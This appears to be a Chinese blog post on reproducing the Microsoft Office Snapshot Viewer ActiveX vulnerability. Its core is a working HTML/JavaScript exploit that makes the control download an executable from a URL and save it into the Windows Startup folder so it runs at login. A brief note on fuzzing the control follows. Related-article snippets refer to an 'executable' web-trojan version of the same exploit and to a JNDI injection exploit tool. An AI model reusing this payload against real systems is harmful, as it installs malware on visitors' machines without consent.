Microsoft Office Snapshot Viewer ActiveX Exploit

最新推荐文章于 2025-11-25 12:54:41 发布
原创 最新推荐文章于 2025-11-25 12:54:41 发布 · 917 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#microsoft #office #测试 #c

本文详细介绍了如何通过SnapshotViewer结合CERT提供的dranzer.pdf文件,重现并分析ActiveX控件中的漏洞。重点讨论了在Fuzzing过程中对关键属性和方法的遍历,特别是对SnapshotPath属性的HTTP GET操作检测,以及如何通过进一步测试其他属性来深入理解漏洞机制。
  Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

EXP:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

Fuzzing时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完
iiprogram
关注
MS Office Snapshot Viewer ActiveX Exploit
07-16 881
 影响系统: Microsoft Access 2003Microsoft Access 2002Microsoft Access 2000Microsoft Snapshot Viewer 10.0.4622详细:受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.Microsoft
Access很好用的报表快照Snapshot View(snp文件)
VB.Net+Android.java
03-03 4308
Access写数据库程序,还是蛮有用的。快捷、方便,容易上手。报表快照文件Snapshot View.snp
Snapshot Viewer报表快照97
12-02
其实2000是带有这个工具的啦,但ACCESS97是没有这个工具的,你可以从这里下载<P> 创建报表快照后,用户即可单独发布生成的快照文件。使用Snapshot ViewerMicrosoft Access可以通过电子邮件传送报表快照  
MS Office Snapshot Viewer ActiveX Exploit (可执行版)
weixin_30879833的博客
07-21 141
可执行版,请勿用于非法用途。 <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "c:/Program Fi...
stackage-snapshots:LTS Haskell和Stackage Nightly快照配置(实验性,用于食品储藏室)
02-09
堆叠快照 LTS Haskell和每晚的Stackage快照配置(实验性,适用于食品储藏室)
MS Office Snapshot Viewer ActiveX Exploit 最新网马
07-16 906
 经本站焦点核(X)安全技术咨询站测试 确实可以执行 被360拦截 微软尚未发布补丁可执行版,请勿用于非法用途。function killErrors() {return true;}window.onerror = killErrors;var x;var obj;var mycars = new Array();mycars[0] = "c:/Program Files/Outlook
gcviewer-1.36-SNAPSHOT
09-16
gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-...
gcViewer工具gcviewer-1.37-SNAPSHOT.jar
01-31
gcViewer工具 gcviewer-1.37-SNAPSHOT.jar
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
gcviewer-1.36-SNAPSHOT.jar
03-15
gcviewer-1.36-SNAPSHOT.jar 主要是jvm 内存垃圾回收 界面图示展示分析 非常好的一筐工具
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
FBSnapshotsViewer:提升iOS快照测试效率的利器
gitblog_00610的博客
09-08 803
FBSnapshotsViewer:提升iOS快照测试效率的利器 在iOS开发中,快照测试Snapshot Testing)是一种非常有效的测试方法,能够帮助开发者快速验证UI组件的渲染结果。然而,随着Xcode 8之后对插件支持的减弱,传统的快照测试工具逐渐失去了便捷性。为了解决这一问题,FBSnapshotsViewer应运而生,它是一款专为iOS开发者设计的macOS应用程序,旨在简化快照...
FBSnapshotsViewer 项目常见问题解决方案
gitblog_00858的博客
11-21 486
FBSnapshotsViewer 项目常见问题解决方案 项目基础介绍 FBSnapshotsViewer 是一个 macOS 应用程序,旨在帮助开发者查看和分析使用 FBSnapshotTestCase 框架进行快照测试时失败的测试用例。该项目的主要编程语言是 Swift,适用于 iOS 和 macOS 开发。 新手使用注意事项及解决方案 1. 安装问题 问题描述:新手在安装 FBSnapsho...
智能玩具新纪元:一个AI能力底座开启创新“加速度”
netease_im的博客
11-24 508
我们定义了情感陪伴智能体的演进阶段:E0阶段为被动机械响应的脚本式交互,E1阶段接入文本大模型后,智能体已经具备上下文理解与短期记忆,到E2阶段的多模态情绪识别,再到E3阶段的主动关怀和长期情感记忆,智能体逐渐建立依恋关系,进一步实现稳定的人格与情绪演化,最终达成共生目标。阙杭宁基于在即时通讯领域的十年技术积累与五年的C端少儿产品深度实践,系统阐释了在AI能力底座下,如何实现通讯技术与智能交互的融合创新,构建情感陪伴垂直场景解决方案,以帮助合作伙伴大幅降低AI应用的创新门槛与POC周期。
多立场AI Agent系统设计与实现:气候变化态度的叙事影响研究
max500600的博客
11-23 71
本文介绍了一个多立场AI Agent系统的设计与实现,旨在研究不同叙事方式对公众气候变化态度的影响。系统包含四个具有不同叙事立场(积极故事性、积极叙事性、消极故事性、消极信息性)的AI Agent,采用模块化架构设计,包含数据库管理、日志系统和Agent初始化等功能。系统通过自然对话交互收集数据,记录对话轮次、用户档案等信息,为研究气候变化叙事效果提供技术支持。核心代码展示了系统类结构、数据库设计和Agent配置实现。
微软认证考试又免费了
最新发布
Hsiao的二进制生活
11-25 515
微软Fabric社区推出"Fabric数据日"活动,提供多项数据认证考试优惠。活动包含DP-600和DP-700认证100%免费考试资格,以及PL-300和DP-900认证50%折扣。参与者需先注册活动,完成指定学习内容后即可申请考试凭证,所有考试需在2025年12月31日前完成。本次活动覆盖从基础到专业的各类数据认证,是提升微软数据生态技能的良好机会。
C项目--羊了个羊(两关全)--含源码
RebrithMan的学习笔记
11-19 1374
使用一个全局二级指针数组指向所有的单层图形块指针数组表示全局地图。通过网盘分享的文件:Game_YLGY.rar。使用一个指针n维数组描述单层图形块指针数组。
Android Framework在原生Settings设置中添加界面
zmlovelx(帅得不敢出门 程序员群31843264)
11-25 450
Android设置中Preference是构建交互界面的核心组件,用于创建开关、列表选择、文本输入等设置项。常用子类包括SwitchPreferenceCompat、ListPreference和EditTextPreference等。实现步骤包括创建PreferenceFragmentCompat、定义XML布局以及在Activity中加载片段。 实战部分演示了在Android 13设备"关于手机"页面添加"认证信息"选项的方法:先在AndroidManifest.
java -jar gcviewer-1.36-snapshot.jar
11-26
java -jar gcviewer-1.36-snapshot.jar是一个用于分析Java虚拟机垃圾回收日志的工具。通过在命令行中输入该命令,可以运行gcviewer-1.36-snapshot.jar文件,打开相应的图形界面界面以分析垃圾回收日志。该工具可以帮助开发人员深入了解Java应用程序的垃圾回收情况,包括垃圾回收的时间、频率、内存占用等信息。 使用该工具可以帮助开发人员进行性能优化,找出应用程序中的内存泄漏或者垃圾回收效率低下的问题,进而优化代码或者调优虚拟机参数,提升应用程序的性能和稳定性。 在运行java -jar gcviewer-1.36-snapshot.jar命令后,会弹出一个图形界面窗口,用户可以选择加载已经生成的垃圾回收日志文件进行分析,也可以通过工具提供的选项实时监控虚拟机垃圾回收的情况。在界面中会展示垃圾回收的统计数据,并以图表的形式直观展示垃圾回收的情况,帮助开发人员更直观地了解应用程序的垃圾回收性能。 总之,java -jar gcviewer-1.36-snapshot.jar是一个十分实用的工具,可以帮助开发人员更好地了解和分析Java应用程序的垃圾回收情况,帮助他们优化应用程序的性能。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值